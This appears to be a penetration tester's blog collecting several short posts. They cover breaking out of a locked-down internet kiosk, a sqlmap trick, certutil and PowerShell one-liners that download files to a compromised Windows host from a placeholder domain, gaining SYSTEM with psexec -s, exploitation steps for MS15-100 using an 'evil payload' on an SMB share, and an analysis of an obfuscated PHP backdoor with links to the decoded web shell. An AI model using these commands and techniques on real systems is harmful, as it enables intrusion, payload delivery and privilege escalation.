Breaking the Internet Kiosk

Objective

Recently for one our Redteam objective, our client request if we can actually break or escape from their Kiosk Solution Environment. Kiosk Lockdown is commonly used in Virtual Internet Banking Station, Airports and various customer services center lot.

Kiosk Lockdown Solutions.

A typical Kiosk Lockdown usually are wrapped around a container like the following pseudo layout.

Svchost.exe --> Lockdown Solutions --> Whitelisted App (in most cases Browsers) 

                

Case Studies - Lockdown Protections

In my case we are only given a keyboard and a mouse to navigate. Here is a screenshot of our lockdown kiosk.


All Drives and Shortcuts are disabled, Start Button have been disabled.

Message from  CTRL + ALT  + DEL have bee suppressed.

Using the UNC path trick didnt work.

Using the File - Print - PDF trick also didn't work this time.

Escaping the Kiosk- Poor man No Kobalt-Strike style.

While the environment certainly looks quite secure in 2020. They are still few loopholes we can leverage on.

What if we host a legit cmd.exe binary and hosted on the Internet and download it can we execute it?

Clicking on RUN works well as cmd is a legit signed  binary and was considered non-malicious by Defender by default. However we will encounter this error which prevent us from using cmd.exe :(

Thanks to Atuk Didier Steven, we can leverage on cmd.exe created by the  ReactOS Project.  (A free and opensource windows implementation binary).

It works.

In order to stay under the radar .. We can fetch "legit" tools from sysinternal 
live.sysinternals.com via net use

Run procexp . from now we have a clear visibility on how to escape :)

Fast re-query trick in SQLMAP

Sometimes you want to perform requery (or running the same query multiple time ) in sqlmap especially when you drop in to sql-shell mode. By default if you are running the same query, it will not execute the query from the injection but from cached/logs.

In order to perform the re-query without exiting sql-shell , one can just append the query with random comment  such as /**/ or  --ff--  (depend on your injection case)..

Windows Post-Shell command. Files Delivery

If you ever obtain a Windows shell remotely. These are few tricks I currently use to summon external files. For my notes.

1. Wgetvbs

https://gist.github.com/sckalath/ec7af6a1786e3de6c309

2. Certutil

 certutil.exe -urlcache -split -f http://wateverdomainip.com/files.blah


3. Powershell


PowerShell (New-Object System.Net.WebClient).DownloadFile

('http://wateverdomainip.com/files.blah','files.blah')

Use https if nesscary.

P/S: Metasploit is awesome but many people are not happy with it. :P

From ADMIN to SYSTEM with love. The case of Windows 10, Server 2016 and above

This is for my mental note. If it benefits you great.

2015 is an extremely challenging year for most of us. Nerveless hitting a shell with admin privileged is not really a big deal. Problem is that on certain environment, the system have been hardened to prevent lsass.exe process making dumping or tampering seems impossible. 

For those of you who are not familiar, onprevious version of Windows we can simply use the at.exe trick combine with remote.exe (refer to Chris Gates note) to obtained SYSTEM (aka NT AUTHORITY\SYSTEM). 

Unfortunately on Windows 10. The at function is no longer available.

This prove to be inconvenience for us. On Alternative method, we can use the meterpeter getsystem command which based on 3 techniques:

You can read on my AV evasion technique. But say you are in a bit of hurry. and  spawning shell via exploits is not priority and what you really truly need is just a Damn Good Shell to ehem let say install software?  Simple just use psexec.  I wrote it about it previously to run as other user. But the current version psexec comes with a GodMode Switch.. that  damn -s switch.

To become a SYSTEM, right click run as admin for your cmd.exe. and run psexec -s -i -d CMD

And thus you are spawn with a shell with the highest integrity.

R.I.P AT and Shift 5 times.

 

Exploiting CVE-2015-2509 /MS15-100 : Windows Media Center could allow remote code execution

Trend Micro blog about it few days ago.  This vulnerability is related to Hacking Team leaked email addresses . The issue is so trival that exploitation is a piece of cake.

Source: https://technet.microsoft.com/en-us/library/security/ms15-100

Based on POC  and description we just need to create a simple mcl file contains our executable path and preso it works.

The caveat for this attack is that you cannot passed an argument such as cmd.exe /c ipconfig  in the mcl file. However we can execute our payload externally via UNC PATH provided by a simple SMB Server. The steps required.

1. Generate evil payload exe
2. Setup a SMB Listener
3. Create MCL file that points to evil payload.
4. Profits.

I use Impacket SMB Server to simulate the steps above. If you are a bit creative, we can use DLL Hijacking  Method to cloak our payload .

Better patch it up fast.

The curious case of crc32 gzinflate php backdoor.

I was working on a side project on an IRH for a certain site. If you got compromised that bad what you should do is ls -lt to find out list of recent files being tampered.

I found out one glaring backdoor which is unlike most php backdoor that I've ever encountered.

















Let's rename it to give it a nicer view..

Summary on how this backdoor works:

• Malicious data is stored in base64.
• Upon execution of the script
• The $data will be decoded from base64
• Attacker/Controller need to submit a correct $key_value via POST or COOKIE
• Each byte of  decoded data  in $data_decode  is XOR against ([$key_value + 72670] % 256)
• $data_decode strings will be reversed and inflate via gzinflate  and assigned to $data_deflate
• $data_deflate crc32 will be compared agains $data_crc32 to ensure the integrity of the code
• A full payload function will be created and executed.

Based on experience you can predict that the final output will contain a function call to either exec() , eval(), proc_open() blax33.

There are 3 major challenges in order to  decode the $data properly:

• Finding the correct keys.
• Any error in gzinflate()  will trigger an exception and stop the script from executing.
• Getting the correct crc32 checksum. 

Althought the correct keys is generate from ( $key_value +76270 ) mod 256 , It's possible just to bruteforce for the correct key from 0x00 till 0xFF due to the fact that the payload is xor one byte at a time.

I've tried to decode it back in python. To my disappoinment there is no gzinflate  function in python  but a famous snippet to compensate that is as below:

ungziped_str = zlib.decompressobj().decompress('x\x9c' + gziped_str)

So my watevershit scripting skills .  If I can find the correct key  I should be able to print out the payload.

But will the scripts work as expected ?

TOPKEK haram nye zlib

I'm still figuring out how to be able to inflate the string without triggering an exception . 

Conclusion

The backdoor is duh obviouly a backdoor, It can be detected easily. However implementing a key to the gzinflate value will stop the payload from being executed both by normal user and reverser..

P/S:If anyone can solve this problem it would be nice.

Attached is the link below :

1. Original Code : http://pastebin.com/aLS0NtdZ

2. Label Code :  http://pastebin.com/Gg56vLni

3. Half-Baked Decoder in Python: http://pastebin.com/HzgFmgr1

Btw it's May . Stay tune for WARGAMES 2015.

Updated :

Thanks to Syed Mohd Fadhil  he introduced two way to handle the zlib error .
 Instad of using 'x\x9c'  use guide from php2python  the equivalent for gzinflate in python like php is

zlib.decompress(compressed_data, -15)

And also introduced a nice try and except block to deal with any exception

And Walla we have a nice shell ..

Thanks all for the help

Attached is the full link 

Bruteforce script: http://pastebin.com/AFDJcUpK

Full Web Shell Code : http://pastebin.com/nmgQwTTf

Bypassing AV in 2015

Haven't blog for quite some time.  This is the basis classical techniques that can be used to bypass AV via Python. Take note current code might not be able to bypass all BUT you be aware that there are tons of API that can be use :)

Get the PDF Files here

https://drive.google.com/file/d/0B9B87VpPnaYiZHZsUjZORXd2Qzg/view?usp=sharing